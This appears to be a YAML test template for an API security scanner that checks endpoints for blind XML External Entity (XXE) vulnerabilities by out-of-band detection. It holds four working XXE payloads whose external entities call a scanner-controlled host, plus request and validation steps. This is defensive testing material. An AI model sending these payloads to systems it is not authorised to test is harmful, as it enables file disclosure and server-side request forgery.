---
id: XXE_BLIND_OOB
info:
  name: "XML External Entity (XXE) - Blind Out-of-Band"
  description: "Tests whether the application is vulnerable to blind XXE attacks using out-of-band detection."
  details: "This test injects blind XXE payloads that attempt to make external HTTP requests to detect XXE vulnerabilities even when file contents are not reflected in the response."
  impact: "XXE vulnerabilities can allow attackers to read arbitrary files, access internal resources, perform SSRF attacks, and potentially execute remote code."
  category:
    name: INJECT
    shortName: Injection
    displayName: Injection
  subCategory: XXE_BLIND_OOB
  severity: MEDIUM
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
    - XXE
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection"
  cwe:
    - CWE-611
  cve:
    - CVE-2021-29447

attributes:
  nature: INTRUSIVE
  plan: STANDARD
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  or:
    - request_payload:
        contains_either:
          - "<?xml"
          - "<xml"
          - "application/xml"
          - "text/xml"
    - request_headers:
        for_one:
          key:
            eq: Content-Type
          value:
            contains_either:
              - application/xml
              - text/xml
    - method:
        contains_either:
          - POST
          - PUT
          - PATCH

wordLists:
  blindXxePayloads:
    - '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://test-services.akto.io/xxe/${random_uuid}">]><foo>&xxe;</foo>'
    - '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "https://test-services.akto.io/xxe/${random_uuid}">]><foo>&xxe;</foo>'
    - '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://test-services.akto.io/xxe/${random_uuid}">%xxe;]><foo>test</foo>'
    - '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://test-services.akto.io/xxe/${random_uuid}">%xxe;]><foo>test</foo>'

execute:
  type: single
  requests:
    - req:
        - send_ssrf_req:
            url: "https://test-services.akto.io/store_uuid/${random_uuid}"
        - replace_body: "${blindXxePayloads}"
        - modify_header:
            Content-Type: "application/xml"

validate:
  ssrf_url_hit: ${random_uuid}
